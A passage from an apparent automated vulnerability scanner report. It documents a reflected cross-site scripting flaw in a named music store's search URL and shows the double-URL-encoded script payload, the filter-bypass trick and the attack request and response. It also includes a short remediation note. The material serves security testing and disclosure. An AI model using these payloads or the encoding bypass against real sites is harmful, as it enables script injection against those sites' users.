Set-Cookie: CFTOKEN=364255175; expires=Sun, 09-Jan-2011 02:37:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Rita Indiana8b4f3</title><script>alert(1)</script>039ab75402c</title>
...[SNIP]...

1.250. http://www.insound.com/search/query/Rita%20Indiana&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Rita%20Indiana&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec45724353e8 was submitted in the REST URL parameter 3. This input was echoed as ebac5"><script>alert(1)</script>c45724353e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Rita%20Indianaebac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec45724353e8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rfn9qtf6ivk7f3vsen3fp9uki2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=101984597; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=195512113; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.